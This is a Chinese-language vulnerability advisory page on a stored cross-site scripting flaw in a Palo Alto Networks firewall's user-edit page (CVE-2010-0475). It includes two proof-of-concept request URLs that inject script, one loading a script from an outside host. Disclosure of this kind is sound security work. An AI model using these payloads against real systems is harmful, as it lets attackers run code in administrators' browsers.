Lucene search
RootSSV:19648HistoryMay 18, 2010 - 12:00 a.m.
Palo Alto Networks防火墙esp/editUser.esp页面存储式跨站脚本漏洞
2010-05-1800:00:00
Root
www.seebug.org
13
0.002 Low
EPSS
Percentile
57.2%
BUGTRAQ ID: 40113
CVE(CAN) ID: CVE-2010-0475
Palo Alto Networks是新一代的硬件防火墙设备。
Palo Alto Networks防火墙的esp/editUser.esp页面没有正确地过滤用户在URL请求中所提供的role参数,远程攻击者可以通过提交恶意参数请求执行跨站脚本攻击,导致在用户浏览器中执行任意HTML和脚本代码。
0
Palo Alto Networks firewall 3.1.x
Palo Alto Networks firewall 3.0.x
厂商补丁:
Palo Alto Networks
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://www.example.com:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT>alert("0wn3d")</SCRIPT> &admin-role=%5Bobject+Object%5D&bSubmit=O
https://www.example.com:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT/XSS src="/http://www.jeromiejackson.com/tryme.js"></SCRIPT>&admin-role=%5Bobject+Object%5D&bSubmit=O
Related
prion
prion
Cross site scripting
2010-05-14 19:30:00
packetstorm
packetstorm
Palo Alto Network Cross Site Scripting
2010-05-14 00:00:00
seebug
seebug
Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)
2014-07-01 00:00:00
securityvulns
securityvulns
Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)
2010-05-13 00:00:00
exploitpack
exploitpack
Palo Alto Network Vulnerability - Cross-Site Scripting
2010-05-19 00:00:00
cve
cve
CVE-2010-0475
2010-05-14 19:30:00
exploitdb
exploitdb
Palo Alto Network Vulnerability - Cross-Site Scripting
2010-05-19 00:00:00